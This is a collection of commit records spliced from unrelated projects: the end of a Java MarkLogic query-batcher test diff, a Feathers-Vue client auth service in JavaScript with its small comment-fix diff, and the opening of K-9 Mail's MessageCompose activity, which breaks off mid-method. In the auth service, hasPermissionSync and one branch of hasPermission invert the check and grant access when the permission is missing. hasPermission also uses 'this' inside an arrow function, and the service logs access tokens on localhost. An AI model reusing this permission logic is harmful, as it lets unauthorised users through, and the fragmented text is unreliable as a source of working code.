<add> <add> // create a handle for the search criteria <add> FileHandle rawHandle = new FileHandle(file); <add> rawHandle.withFormat(Format.XML); <add> // create a search definition based on the handle <add> RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); <add> <add> StringBuilder batchResults = new StringBuilder(); <add> StringBuilder batchFailResults = new StringBuilder(); <add> <add> // Run a QueryBatcher on the new URIs. <add> QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); <add> <add> queryBatcher1.onUrisReady(batch-> { <add> for (String str : batch.getItems()) { <add> batchResults.append(str) <add> .append('|'); <add> } <add> }); <add> queryBatcher1.onQueryFailure(throwable-> { <add> System.out.println("Exceptions thrown from callback onQueryFailure"); <add> throwable.printStackTrace(); <add> batchFailResults.append("Test has Exceptions"); <add> } ); <add> <add> JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); <add> boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); <add> <add> if (queryBatcher1.isStopped()) { <add> <add> if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { <add> fail("Test failed due to exceptions"); <add> } <add> <add> // Verify the batch results now. 
<add> String[] res = batchResults.toString().split("\\|"); <add> assertEquals("Number of reults returned is incorrect", 2, res.length); <add> assertTrue("URI returned not correct", res[0].contains("pathindex1.xml")?true:(res[1].contains("pathindex1.xml")?true:false)); <add> assertTrue("URI returned not correct", res[0].contains("pathindex2.xml")?true:(res[1].contains("pathindex2.xml")?true:false)); <add> } <add> } <add> catch (Exception e) { <add> System.out.println("Exceptions thrown from testRawCombinedQueryPathIndex"); <add> System.out.println(e.getMessage()); <add> } <add> finally { <add> // Associate back the original DB. <add> associateRESTServerWithDB(restServerName, dbName); <add> detachForest(testMultipleDB, testMultipleForest[0]); <add> detachForest(testMultipleDB, testMultipleForest[1]); <add> deleteDB(testMultipleDB); <add> <add> deleteForest(testMultipleForest[0]); <add> deleteForest(testMultipleForest[1]); <add> Thread.sleep(10000); <add> clientTmp.release(); <add> } <add> } <ide> <ide> /* <ide> * To test query by example with WriteBatcher and QueryBatcher <ide> } <ide> <ide> } <add> <ide> <ide> /* <ide> * To test query by example with WriteBatcher and QueryBatcher <ide> while(!queryBatcher1.isStopped()) { <ide> // do nothing. <ide> } <del> <ide> if (queryBatcher1.isStopped()) { <ide> <ide> if (!batchWordFailResults.toString().isEmpty() && batchWordFailResults.toString().contains("Exceptions")) {
JavaScript
mit
7ce00e43d3709936b2c77129bb1f08f87edc33e2
0
codingfriend1/Feathers-Vue
/** * Dream Code Auth Service * * Client-Side Authentication and Authorization Service * * Creates a global `auth` constant * Methods * * - __authenticate({ email, password }) - internal method * * - login({ email, password }) * * - logout() * * - signup({ email, name, password }) * * - changePassword({ oldPassword, newPassword }) * * - changeMyIdentity( password, { email, name }) - Must be logged in * * - verifySignUp( verifyToken ) * * - verifyChanges( verifyToken ) * * - resendVerification( email ) * * - sendResetPassword( email ) * * - resetPassword( email ) * * - getToken() * * - isLoggedIn() * * - hasPermission( permissionName ) - * Checks user permissions against a single permission string * but waits for login request to finish * * - hasPermissionSync( permissionName ) * * Properties * - currentUser - Contains the current user definition */ const auth = { currentUser: null, __authenticate: user => { user = user ? Object.assign(user, { strategy: 'local' }): undefined return feathers.authenticate( user ) .then(response => { if(window.location.hostname.indexOf('localhost') > -1) { notify.log('Access Token: ', response.accessToken) notify.log('User: ', response.user) } feathers.set('user', response.user) auth.currentUser = feathers.get('user') return auth.currentUser }) }, login: async user => { auth.logout() var [err, foundUser] = await to( auth.__authenticate(user) ) if(!err) { notify.success(`Hello ${foundUser.name || foundUser.email}`) return auth.currentUser } else { notify.warning(err.message) notify.debug('Error authenticating', err) auth.logout() return false } }, logout: async user => { feathers.logout() feathers.set('user', null) auth.currentUser = null }, signup: async user => { if(!user) { notify.error('Please fill out the user information') return false } auth.logout() let [err, result] = await api.users.create(user) if(!err) { let options = { type: 'local', email: user.email, password: user.password } let [authFail, currentUser] = await to( auth.__authenticate(user) ) if(!authFail) { notify.success(`Hello ${currentUser.name || currentUser.email}. Please check your email and verify so we can protect your account.`) return auth.currentUser } else { notify.error(parseErrors(authFail), 'Error signing up') return false } } else { if(err.code === 409) { notify.error('That email is already taken.') } else { notify.error(parseErrors(err)) } return false } }, changePassword: async function(oldPassword, password) { if(!_.get(auth, 'currentUser.email')) { notify.warning('You must be logged in to change your password.') return false } let options = { action: 'passwordChange', value: { user: { email: auth.currentUser.email }, oldPassword, password } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Your current password has been changed. Next time you log in please use the new password.') } else { notify.error(err.message) } }, changeMyIdentity: async function(password, changes) { if(!_.get(auth, 'currentUser.email')) { notify.warning('You must be logged in to update your account.') return false } if(!password) { notify.warning('You must provide a password to update your account.') return false } if(!changes) { notify.warning('Please provide information to update your account with.') return false } let options = { action: 'identityChange', value: { password, changes, user: { email: auth.currentUser.email } } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('The changes are pending. 
Please check your email to verify that you made the change.') } else { notify.error(err.message) } }, verifySignUp: async function verifySignUp(slug) { if(!slug) { return false } let [err, response] = await api.authManagement.create({ action: 'verifySignupLong', value: slug }) if(!err) { notify.success('Your email has been verified. We can now protect your account.') } else { notify.error('Sorry, but we could not verify your email.') notify.debug("Verify Email Error: ", err) } return response }, verifyChanges: async function verifyChanges(slug) { if(!slug) { return false } let [err, response] = await api.authManagement.create({ action: 'verifySignupLong', value: slug }) if(!err) { notify.success('You have approved the changes to your account. You may now sign in under the new email.') } else { notify.error('Sorry, but we could not approved the changes to your account.') notify.debug("Verify Changes Error: ", err) } }, resendVerification: async function resendVerification(email) { if(_.get(auth, 'currentUser.isVerified')) { return notify.success("This account has already been verified") } if(!email) { notify.success('Please fill out your email to verify.') return false } let options = { action: 'resendVerifySignup', value: { email } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Another verification email has been sent.') } else { notify.error('Sorry but we could not send a verification email.') } }, sendResetPassword: async function sendResetPassword(email) { if(!email) { notify.warning('Please provide your email so we can send you a reset password email.') return false } let options = { action: 'sendResetPwd', value: { email } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Please check your email. A link to reset your password has been sent.') } else { notify.warning(err.message) notify.debug('Error sending reset password email', err) } }, resetPassword: async function saveResetPassword(slug, password) { let options = { action: 'resetPwdLong', value: { token: slug, password } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Your password was updated. You may now sign in under the new password.') return true } else { notify.warning('Sorry but there was an error updating your password.') } }, getToken: () => feathers.get('token'), isLoggedIn: () => { return auth.__authenticate().then(response => { auth.currentUser = feathers.get('user') return auth.currentUser }, err => { notify.debug("Currently not logged in") }) }, hasPermission: permissionName => { let privs = _.get(auth, 'currentUser.permissions') if(!privs) { return this.isLoggedIn().then(isLoggedIn => { if(!isLoggedIn) { return false } auth.currentUser = feathers.get('user') let privs = _.get(auth, 'currentUser.permissions') return !privs || (!privs.includes(permissionName) && _.get(auth, 'currentUser.role') !== 'admin') }, err => { return false }) } else { if(privs.includes(permissionName) || _.get(auth, 'currentUser.role') === 'admin') { return true } else { return false } } }, hasPermissionSync: permissionName => { let privs = _.get(auth, 'currentUser.permissions') return !privs || (!privs.includes(permissionName) && _.get(auth, 'currentUser.role') !== 'admin') } } try { global.auth = auth } catch(err) {} module.exports = auth
app/services/auth.service.js
/** * Dream Code Auth Service * * Client-Side Authentication and Authorization Service * * Creates a global `auth` constant * Methods * * - __authenticate({ email, password }) - internal method * * - login({ email, password }) * * - logout() * * - signup({ email, name, password }) * * - changePassword({ oldPassword, newPassword }) * * - changeMyIdentity( password, { email, name }) - Must be logged in * * - verifySignUp( verifyToken ) * * - verifyChanges( verifyToken ) * * - resendVerification( email ) * * - sendResetPassword( email ) * * - resetPassword( email ) * * - getToken() * * - isLoggedIn() * * - hasPermission( permissionName ) - * Checks user permissions against a single permission string * but waits for login request to finish * * - hasPermissionSync( permissionName ) * * Properties * - currentUser - Containers the current user definition */ const auth = { currentUser: null, __authenticate: user => { user = user ? Object.assign(user, { strategy: 'local' }): undefined return feathers.authenticate( user ) .then(response => { if(window.location.hostname.indexOf('localhost') > -1) { notify.log('Access Token: ', response.accessToken) notify.log('User: ', response.user) } feathers.set('user', response.user) auth.currentUser = feathers.get('user') return auth.currentUser // return feathers.passport.verifyJWT(response.accessToken) }) }, login: async user => { auth.logout() var [err, foundUser] = await to( auth.__authenticate(user) ) if(!err) { notify.success(`Hello ${foundUser.name || foundUser.email}`) return auth.currentUser } else { notify.warning(err.message) notify.debug('Error authenticating', err) auth.logout() return false } }, logout: async user => { feathers.logout() feathers.set('user', null) auth.currentUser = null }, signup: async user => { if(!user) { notify.error('Please fill out the user information') return false } auth.logout() let [err, result] = await api.users.create(user) if(!err) { let options = { type: 'local', email: user.email, password: user.password } let [authFail, currentUser] = await to( auth.__authenticate(user) ) if(!authFail) { notify.success(`Hello ${currentUser.name || currentUser.email}. Please check your email and verify so we can protect your account.`) return auth.currentUser } else { notify.error(parseErrors(authFail), 'Error signing up') return false } } else { if(err.code === 409) { notify.error('That email is already taken.') } else { notify.error(parseErrors(err)) } return false } }, changePassword: async function(oldPassword, password) { if(!_.get(auth, 'currentUser.email')) { notify.warning('You must be logged in to change your password.') return false } let options = { action: 'passwordChange', value: { user: { email: auth.currentUser.email }, oldPassword, password } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Your current password has been changed. 
Next time you log in please use the new password.') } else { notify.error(err.message) } }, changeMyIdentity: async function(password, changes) { if(!_.get(auth, 'currentUser.email')) { notify.warning('You must be logged in to update your account.') return false } if(!password) { notify.warning('You must provide a password to update your account.') return false } if(!changes) { notify.warning('Please provide information to update your account with.') return false } let options = { action: 'identityChange', value: { password, changes, user: { email: auth.currentUser.email } } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('The changes are pending. Please check your email to verify that you made the change.') } else { notify.error(err.message) } }, verifySignUp: async function verifySignUp(slug) { if(!slug) { return false } let [err, response] = await api.authManagement.create({ action: 'verifySignupLong', value: slug }) if(!err) { notify.success('Your email has been verified. We can now protect your account.') } else { notify.error('Sorry, but we could not verify your email.') notify.debug("Verify Email Error: ", err) } return response }, verifyChanges: async function verifyChanges(slug) { if(!slug) { return false } let [err, response] = await api.authManagement.create({ action: 'verifySignupLong', value: slug }) if(!err) { notify.success('You have approved the changes to your account. You may now sign in under the new email.') } else { notify.error('Sorry, but we could not approved the changes to your account.') notify.debug("Verify Changes Error: ", err) } }, resendVerification: async function resendVerification(email) { if(_.get(auth, 'currentUser.isVerified')) { return notify.success("This account has already been verified") } if(!email) { notify.success('Please fill out your email to verify.') return false } let options = { action: 'resendVerifySignup', value: { email } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Another verification email has been sent.') } else { notify.error('Sorry but we could not send a verification email.') } }, sendResetPassword: async function sendResetPassword(email) { if(!email) { notify.warning('Please provide your email so we can send you a reset password email.') return false } let options = { action: 'sendResetPwd', value: { email } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Please check your email. A link to reset your password has been sent.') } else { notify.warning(err.message) notify.debug('Error sending reset password email', err) } }, resetPassword: async function saveResetPassword(slug, password) { let options = { action: 'resetPwdLong', value: { token: slug, password } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Your password was updated. 
You may now sign in under the new password.') return true } else { notify.warning('Sorry but there was an error updating your password.') } }, getToken: () => feathers.get('token'), isLoggedIn: () => { return auth.__authenticate().then(response => { auth.currentUser = feathers.get('user') return auth.currentUser }, err => { notify.debug("Currently not logged in") }) }, hasPermission: permissionName => { let privs = _.get(auth, 'currentUser.permissions') if(!privs) { return this.isLoggedIn().then(isLoggedIn => { if(!isLoggedIn) { return false } auth.currentUser = feathers.get('user') let privs = _.get(auth, 'currentUser.permissions') return !privs || (!privs.includes(permissionName) && _.get(auth, 'currentUser.role') !== 'admin') }, err => { return false }) } else { if(privs.includes(permissionName) || _.get(auth, 'currentUser.role') === 'admin') { return true } else { return false } } }, hasPermissionSync: permissionName => { let privs = _.get(auth, 'currentUser.permissions') return !privs || (!privs.includes(permissionName) && _.get(auth, 'currentUser.role') !== 'admin') } } try { global.auth = auth } catch(err) {} module.exports = auth
Fixes commented code in auth service.
app/services/auth.service.js
Fixes commented code in auth service.
<ide><path>pp/services/auth.service.js <ide> * - hasPermissionSync( permissionName ) <ide> * <ide> * Properties <del> * - currentUser - Containers the current user definition <add> * - currentUser - Contains the current user definition <ide> */ <ide> <ide> const auth = { <ide> feathers.set('user', response.user) <ide> auth.currentUser = feathers.get('user') <ide> return auth.currentUser <del> <del> // return feathers.passport.verifyJWT(response.accessToken) <add> <ide> }) <ide> <ide> },
Java
bsd-3-clause
4c1060ecae19cb03e4ca1e67eae3480d308b3f62
0
bashrc/k-9,github201407/k-9,leixinstar/k-9,dgger/k-9,k9mail/k-9,tonytamsf/k-9,herpiko/k-9,rtreffer/openpgp-k-9,leixinstar/k-9,439teamwork/k-9,dpereira411/k-9,cketti/k-9,thuanpq/k-9,icedman21/k-9,torte71/k-9,leixinstar/k-9,deepworks/k-9,crr0004/k-9,mawiegand/k-9,WenduanMou1/k-9,denim2x/k-9,tsunli/k-9,sebkur/k-9,vt0r/k-9,tonytamsf/k-9,philipwhiuk/q-mail,konfer/k-9,nilsbraden/k-9,GuillaumeSmaha/k-9,rollbrettler/k-9,XiveZ/k-9,dgger/k-9,cooperpellaton/k-9,huhu/k-9,tsunli/k-9,WenduanMou1/k-9,moparisthebest/k-9,gilbertw1/k-9,dhootha/k-9,k9mail/k-9,sanderbaas/k-9,KitAway/k-9,vt0r/k-9,k9mail/k-9,github201407/k-9,herpiko/k-9,Eagles2F/k-9,huhu/k-9,crr0004/k-9,dhootha/k-9,suzp1984/k-9,sanderbaas/k-9,rishabhbitsg/k-9,sonork/k-9,farmboy0/k-9,cooperpellaton/k-9,gilbertw1/k-9,gnebsy/k-9,rollbrettler/k-9,ndew623/k-9,sebkur/k-9,sonork/k-9,denim2x/k-9,moparisthebest/k-9,sebkur/k-9,vasyl-khomko/k-9,philipwhiuk/q-mail,cliniome/pki,gnebsy/k-9,sedrubal/k-9,imaeses/k-9,KitAway/k-9,sanderbaas/k-9,nilsbraden/k-9,philipwhiuk/k-9,vatsalsura/k-9,bashrc/k-9,G00fY2/k-9_material_design,thuanpq/k-9,farmboy0/k-9,farmboy0/k-9,msdgwzhy6/k-9,icedman21/k-9,dgger/k-9,Eagles2F/k-9,denim2x/k-9,cliniome/pki,cketti/k-9,gaionim/k-9,cketti/k-9,cliniome/pki,icedman21/k-9,Valodim/k-9,XiveZ/k-9,dhootha/k-9,WenduanMou1/k-9,GuillaumeSmaha/k-9,nilsbraden/k-9,cketti/k-9,Eagles2F/k-9,indus1/k-9,imaeses/k-9,thuanpq/k-9,konfer/k-9,deepworks/k-9,gnebsy/k-9,439teamwork/k-9,crr0004/k-9,huhu/k-9,vasyl-khomko/k-9,gaionim/k-9,ndew623/k-9,439teamwork/k-9,sedrubal/k-9,suzp1984/k-9,rishabhbitsg/k-9,jca02266/k-9,github201407/k-9,msdgwzhy6/k-9,philipwhiuk/q-mail,G00fY2/k-9_material_design,jberkel/k-9,dpereira411/k-9,herpiko/k-9,rtreffer/openpgp-k-9,CodingRmy/k-9,mawiegand/k-9,jca02266/k-9,philipwhiuk/k-9,ndew623/k-9,msdgwzhy6/k-9,gilbertw1/k-9,cooperpellaton/k-9,bashrc/k-9,suzp1984/k-9,indus1/k-9,XiveZ/k-9,torte71/k-9,CodingRmy/k-9,GuillaumeSmaha/k-9,KitAway/k-9,tsunli/k-9,imaeses/k-9,jca02266/k-9,gaionim/k-9,vasyl-khomko/k-9,rollbrettler/k-9,konfer/k-9,roscrazy/k-9,dpereira411/k-9,roscrazy/k-9,sonork/k-9,moparisthebest/k-9,tonytamsf/k-9,torte71/k-9,jberkel/k-9,mawiegand/k-9,vatsalsura/k-9,deepworks/k-9
package com.fsck.k9.activity; import java.io.File; import java.io.Serializable; import java.io.UnsupportedEncodingException; import java.net.URLDecoder; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.StringTokenizer; import org.apache.james.mime4j.codec.EncoderUtil; import android.app.AlertDialog; import android.app.Dialog; import android.content.ContentResolver; import android.content.Context; import android.content.DialogInterface; import android.content.Intent; import android.content.pm.ActivityInfo; import android.database.Cursor; import android.net.Uri; import android.os.AsyncTask; import android.os.Bundle; import android.os.Handler; import android.os.Parcelable; import android.provider.OpenableColumns; import android.text.TextWatcher; import android.text.util.Rfc822Tokenizer; import android.util.Log; import android.view.KeyEvent; import android.view.Menu; import android.view.MenuItem; import android.view.View; import android.view.View.OnClickListener; import android.view.View.OnFocusChangeListener; import android.view.Window; import android.widget.AutoCompleteTextView.Validator; import android.widget.CheckBox; import android.widget.EditText; import android.widget.ImageButton; import android.widget.LinearLayout; import android.widget.MultiAutoCompleteTextView; import android.widget.TextView; import android.widget.Toast; import com.fsck.k9.Account; import com.fsck.k9.EmailAddressAdapter; import com.fsck.k9.EmailAddressValidator; import com.fsck.k9.Identity; import com.fsck.k9.K9; import com.fsck.k9.Preferences; import com.fsck.k9.R; import com.fsck.k9.controller.MessagingController; import com.fsck.k9.controller.MessagingListener; import com.fsck.k9.crypto.CryptoProvider; import com.fsck.k9.helper.Utility; import com.fsck.k9.mail.Address; import com.fsck.k9.mail.Body; import com.fsck.k9.mail.Flag; import com.fsck.k9.mail.Message; import com.fsck.k9.mail.Message.RecipientType; import com.fsck.k9.mail.MessagingException; import com.fsck.k9.mail.Multipart; import com.fsck.k9.mail.Part; import com.fsck.k9.mail.internet.MimeBodyPart; import com.fsck.k9.mail.internet.MimeHeader; import com.fsck.k9.mail.internet.MimeMessage; import com.fsck.k9.mail.internet.MimeMultipart; import com.fsck.k9.mail.internet.MimeUtility; import com.fsck.k9.mail.internet.TextBody; import com.fsck.k9.mail.store.LocalStore; import com.fsck.k9.mail.store.LocalStore.LocalAttachmentBody; public class MessageCompose extends K9Activity implements OnClickListener, OnFocusChangeListener { private static final int DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE = 1; private static final String ACTION_REPLY = "com.fsck.k9.intent.action.REPLY"; private static final String ACTION_REPLY_ALL = "com.fsck.k9.intent.action.REPLY_ALL"; private static final String ACTION_FORWARD = "com.fsck.k9.intent.action.FORWARD"; private static final String ACTION_EDIT_DRAFT = "com.fsck.k9.intent.action.EDIT_DRAFT"; private static final String EXTRA_ACCOUNT = "account"; private static final String EXTRA_MESSAGE_BODY = "messageBody"; private static final String EXTRA_MESSAGE_REFERENCE = "message_reference"; private static final String STATE_KEY_ATTACHMENTS = "com.fsck.k9.activity.MessageCompose.attachments"; private static final String STATE_KEY_CC_SHOWN = "com.fsck.k9.activity.MessageCompose.ccShown"; private static final String STATE_KEY_BCC_SHOWN = "com.fsck.k9.activity.MessageCompose.bccShown"; private static final String STATE_KEY_QUOTED_TEXT_SHOWN = "com.fsck.k9.activity.MessageCompose.quotedTextShown"; 
private static final String STATE_KEY_SOURCE_MESSAGE_PROCED = "com.fsck.k9.activity.MessageCompose.stateKeySourceMessageProced"; private static final String STATE_KEY_DRAFT_UID = "com.fsck.k9.activity.MessageCompose.draftUid"; private static final String STATE_IDENTITY_CHANGED = "com.fsck.k9.activity.MessageCompose.identityChanged"; private static final String STATE_IDENTITY = "com.fsck.k9.activity.MessageCompose.identity"; private static final String STATE_CRYPTO = "crypto"; private static final String STATE_IN_REPLY_TO = "com.fsck.k9.activity.MessageCompose.inReplyTo"; private static final String STATE_REFERENCES = "com.fsck.k9.activity.MessageCompose.references"; private static final int MSG_PROGRESS_ON = 1; private static final int MSG_PROGRESS_OFF = 2; private static final int MSG_UPDATE_TITLE = 3; private static final int MSG_SKIPPED_ATTACHMENTS = 4; private static final int MSG_SAVED_DRAFT = 5; private static final int MSG_DISCARDED_DRAFT = 6; private static final int ACTIVITY_REQUEST_PICK_ATTACHMENT = 1; private static final int ACTIVITY_CHOOSE_IDENTITY = 2; private static final int ACTIVITY_CHOOSE_ACCOUNT = 3; /** * The account used for message composition. */ private Account mAccount; /** * This identity's settings are used for message composition. * Note: This has to be an identity of the account {@link #mAccount}. */ private Identity mIdentity; private boolean mIdentityChanged = false; private boolean mSignatureChanged = false; /** * Reference to the source message (in case of reply, forward, or edit * draft actions). */ private MessageReference mMessageReference; private Message mSourceMessage; private String mSourceMessageBody; /** * Indicates that the source message has been processed at least once and should not * be processed on any subsequent loads. This protects us from adding attachments that * have already been added from the restore of the view state. */ private boolean mSourceMessageProcessed = false; private TextView mFromView; private MultiAutoCompleteTextView mToView; private MultiAutoCompleteTextView mCcView; private MultiAutoCompleteTextView mBccView; private EditText mSubjectView; private EditText mSignatureView; private EditText mMessageContentView; private LinearLayout mAttachments; private View mQuotedTextBar; private ImageButton mQuotedTextDelete; private EditText mQuotedText; private View mEncryptLayout; private CheckBox mCryptoSignatureCheckbox; private CheckBox mEncryptCheckbox; private TextView mCryptoSignatureUserId; private TextView mCryptoSignatureUserIdRest; private CryptoProvider mCrypto = null; private String mReferences; private String mInReplyTo; private boolean mDraftNeedsSaving = false; private boolean mPreventDraftSaving = false; /** * The draft uid of this message. This is used when saving drafts so that the same draft is * overwritten instead of being created anew. This property is null until the first save. 
*/ private String mDraftUid; private Handler mHandler = new Handler() { @Override public void handleMessage(android.os.Message msg) { switch (msg.what) { case MSG_PROGRESS_ON: setProgressBarIndeterminateVisibility(true); break; case MSG_PROGRESS_OFF: setProgressBarIndeterminateVisibility(false); break; case MSG_UPDATE_TITLE: updateTitle(); break; case MSG_SKIPPED_ATTACHMENTS: Toast.makeText( MessageCompose.this, getString(R.string.message_compose_attachments_skipped_toast), Toast.LENGTH_LONG).show(); break; case MSG_SAVED_DRAFT: Toast.makeText( MessageCompose.this, getString(R.string.message_saved_toast), Toast.LENGTH_LONG).show(); break; case MSG_DISCARDED_DRAFT: Toast.makeText( MessageCompose.this, getString(R.string.message_discarded_toast), Toast.LENGTH_LONG).show(); break; default: super.handleMessage(msg); break; } } }; private Listener mListener = new Listener(); private EmailAddressAdapter mAddressAdapter; private Validator mAddressValidator; class Attachment implements Serializable { public String name; public String contentType; public long size; public Uri uri; } /** * Compose a new message using the given account. If account is null the default account * will be used. * @param context * @param account */ public static void actionCompose(Context context, Account account) { if (account == null) { account = Preferences.getPreferences(context).getDefaultAccount(); } Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_ACCOUNT, account.getUuid()); context.startActivity(i); } /** * Compose a new message as a reply to the given message. If replyAll is true the function * is reply all instead of simply reply. * @param context * @param account * @param message * @param replyAll * @param messageBody optional, for decrypted messages, null if it should be grabbed from the given message */ public static void actionReply( Context context, Account account, Message message, boolean replyAll, String messageBody) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_BODY, messageBody); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); if (replyAll) { i.setAction(ACTION_REPLY_ALL); } else { i.setAction(ACTION_REPLY); } context.startActivity(i); } /** * Compose a new message as a forward of the given message. * @param context * @param account * @param message * @param messageBody optional, for decrypted messages, null if it should be grabbed from the given message */ public static void actionForward( Context context, Account account, Message message, String messageBody) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_BODY, messageBody); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); i.setAction(ACTION_FORWARD); context.startActivity(i); } /** * Continue composition of the given message. This action modifies the way this Activity * handles certain actions. * Save will attempt to replace the message in the given folder with the updated version. * Discard will delete the message from the given folder. 
* @param context * @param account * @param folder * @param message */ public static void actionEditDraft(Context context, Account account, Message message) { Intent i = new Intent(context, MessageCompose.class); i.putExtra(EXTRA_MESSAGE_REFERENCE, message.makeMessageReference()); i.setAction(ACTION_EDIT_DRAFT); context.startActivity(i); } @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); requestWindowFeature(Window.FEATURE_INDETERMINATE_PROGRESS); setContentView(R.layout.message_compose); final Intent intent = getIntent(); mMessageReference = (MessageReference) intent.getSerializableExtra(EXTRA_MESSAGE_REFERENCE); mSourceMessageBody = (String) intent.getStringExtra(EXTRA_MESSAGE_BODY); final String accountUuid = (mMessageReference != null) ? mMessageReference.accountUuid : intent.getStringExtra(EXTRA_ACCOUNT); mAccount = Preferences.getPreferences(this).getAccount(accountUuid); if (mAccount == null) { mAccount = Preferences.getPreferences(this).getDefaultAccount(); } if (mAccount == null) { /* * There are no accounts set up. This should not have happened. Prompt the * user to set up an account as an acceptable bailout. */ startActivity(new Intent(this, Accounts.class)); mDraftNeedsSaving = false; finish(); return; } mAddressAdapter = EmailAddressAdapter.getInstance(this); mAddressValidator = new EmailAddressValidator(); mFromView = (TextView)findViewById(R.id.from); mToView = (MultiAutoCompleteTextView)findViewById(R.id.to); mCcView = (MultiAutoCompleteTextView)findViewById(R.id.cc); mBccView = (MultiAutoCompleteTextView)findViewById(R.id.bcc); mSubjectView = (EditText)findViewById(R.id.subject); EditText upperSignature = (EditText)findViewById(R.id.upper_signature); EditText lowerSignature = (EditText)findViewById(R.id.lower_signature); mMessageContentView = (EditText)findViewById(R.id.message_content); mAttachments = (LinearLayout)findViewById(R.id.attachments); mQuotedTextBar = findViewById(R.id.quoted_text_bar); mQuotedTextDelete = (ImageButton)findViewById(R.id.quoted_text_delete); mQuotedText = (EditText)findViewById(R.id.quoted_text); TextWatcher watcher = new TextWatcher() { public void beforeTextChanged(CharSequence s, int start, int before, int after) { } public void onTextChanged(CharSequence s, int start, int before, int count) { mDraftNeedsSaving = true; } public void afterTextChanged(android.text.Editable s) { } }; TextWatcher sigwatcher = new TextWatcher() { public void beforeTextChanged(CharSequence s, int start, int before, int after) { } public void onTextChanged(CharSequence s, int start, int before, int count) { mDraftNeedsSaving = true; mSignatureChanged = true; } public void afterTextChanged(android.text.Editable s) { } }; mToView.addTextChangedListener(watcher); mCcView.addTextChangedListener(watcher); mBccView.addTextChangedListener(watcher); mSubjectView.addTextChangedListener(watcher); mMessageContentView.addTextChangedListener(watcher); mQuotedText.addTextChangedListener(watcher); /* * We set this to invisible by default. Other methods will turn it back on if it's * needed. 
*/ mQuotedTextBar.setVisibility(View.GONE); mQuotedText.setVisibility(View.GONE); mQuotedTextDelete.setOnClickListener(this); mFromView.setVisibility(View.GONE); mToView.setAdapter(mAddressAdapter); mToView.setTokenizer(new Rfc822Tokenizer()); mToView.setValidator(mAddressValidator); mCcView.setAdapter(mAddressAdapter); mCcView.setTokenizer(new Rfc822Tokenizer()); mCcView.setValidator(mAddressValidator); mBccView.setAdapter(mAddressAdapter); mBccView.setTokenizer(new Rfc822Tokenizer()); mBccView.setValidator(mAddressValidator); mSubjectView.setOnFocusChangeListener(this); if (savedInstanceState != null) { /* * This data gets used in onCreate, so grab it here instead of onRestoreIntstanceState */ mSourceMessageProcessed = savedInstanceState.getBoolean(STATE_KEY_SOURCE_MESSAGE_PROCED, false); } String action = intent.getAction(); if (Intent.ACTION_VIEW.equals(action) || Intent.ACTION_SENDTO.equals(action)) { /* * Someone has clicked a mailto: link. The address is in the URI. */ if (intent.getData() != null) { Uri uri = intent.getData(); if ("mailto".equals(uri.getScheme())) { initializeFromMailTo(uri.toString()); } else { String toText = uri.getSchemeSpecificPart(); if (toText != null) { mToView.setText(toText); } } } } //TODO: Use constant Intent.ACTION_SEND_MULTIPLE once we drop Android 1.5 support else if (Intent.ACTION_SEND.equals(action) || Intent.ACTION_SENDTO.equals(action) || "android.intent.action.SEND_MULTIPLE".equals(action)) { /* * Someone is trying to compose an email with an attachment, probably Pictures. * The Intent should contain an EXTRA_STREAM with the data to attach. */ String text = intent.getStringExtra(Intent.EXTRA_TEXT); if (text != null) { mMessageContentView.setText(text); } String subject = intent.getStringExtra(Intent.EXTRA_SUBJECT); if (subject != null) { mSubjectView.setText(subject); } String type = intent.getType(); //TODO: Use constant Intent.ACTION_SEND_MULTIPLE once we drop Android 1.5 support if ("android.intent.action.SEND_MULTIPLE".equals(action)) { ArrayList<Parcelable> list = intent.getParcelableArrayListExtra(Intent.EXTRA_STREAM); if (list != null) { for (Parcelable parcelable : list) { Uri stream = (Uri) parcelable; if (stream != null && type != null) { if (MimeUtility.mimeTypeMatches(type, K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES)) { addAttachment(stream); } } } } } else { Uri stream = (Uri) intent.getParcelableExtra(Intent.EXTRA_STREAM); if (stream != null && type != null) { if (MimeUtility.mimeTypeMatches(type, K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES)) { addAttachment(stream); } } } /* * There might be an EXTRA_SUBJECT, EXTRA_TEXT, EXTRA_EMAIL, EXTRA_BCC or EXTRA_CC */ String extraSubject = intent.getStringExtra(Intent.EXTRA_SUBJECT); String extraText = intent.getStringExtra(Intent.EXTRA_TEXT); mSubjectView.setText(extraSubject); mMessageContentView.setText(extraText); String[] extraEmail = intent.getStringArrayExtra(Intent.EXTRA_EMAIL); String[] extraCc = intent.getStringArrayExtra(Intent.EXTRA_CC); String[] extraBcc = intent.getStringArrayExtra(Intent.EXTRA_BCC); String addressList; // Cache array size, as per Google's recommendations. 
